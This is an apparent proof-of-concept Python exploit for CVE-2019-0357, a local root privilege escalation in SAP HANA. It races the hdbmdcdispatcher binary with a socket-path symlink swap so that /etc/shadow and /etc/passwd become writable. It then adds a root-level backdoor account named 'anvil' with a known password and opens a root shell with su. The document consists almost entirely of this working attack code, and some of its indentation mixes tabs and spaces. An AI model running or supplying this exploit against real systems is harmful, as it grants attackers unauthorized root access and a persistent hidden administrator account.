CVE-2019-0357 - SAP-HANA root privesc vuln

CVE-2019-0357 - SAP-HANA root

import os
import signal
import sys

ATTEMPTS = (100 * 1000)

bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"

passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"

shadow_entry = b"anvil:$6$4x3OFPhx$OdAa..WfmrBGhRzEue9iig8." \
               b"vDh8cu6vP2tmSPRsHkylgOYz9xitwqKM/Ql/28f6hO" \
               b"09xkajSJGu3mA7gZL.C/:17950:0:::::"

def add_line_if_not_there(fn, line):
    with open(fn, "r") as fd:
        add = fd.read().find(line) == -1
        if not add:
            return
    with open(fn, "a") as fd:
        fd.write(line)
     	fd.write("\n")

def race_file(fn, line):
    newpid = os.fork()
    if newpid == 0:
        # child
        cmd = "%s -s HXE -m 0777" % bin2exec
        os.system(cmd)
        sys.exit(1)

    ret = False
    try:
        os.unlink(socketfn)
        os.symlink(fn, socketfn)
        add_line_if_not_there(fn, line)
        ret = True
    except Exception:
        pass
    os.kill(newpid, signal.SIGKILL)
    os.wait()
    return ret

def race_file_attempts(fn, line, attempts):
    for n in range(0, attempts):
    	if race_file(fn, line):
    		break
        n += 1
    print("Needed %i attempts to race and modify %s" % (n, fn))

def run(n):
    race_file_attempts("/etc/shadow", shadow_entry, n)
    race_file_attempts("/etc/passwd", passwd_entry, n)
    print("Now running `su - anvil` for you. Password is `anvil`")
    os.system("su - anvil")

if __name__ == "__main__":
    run(ATTEMPTS)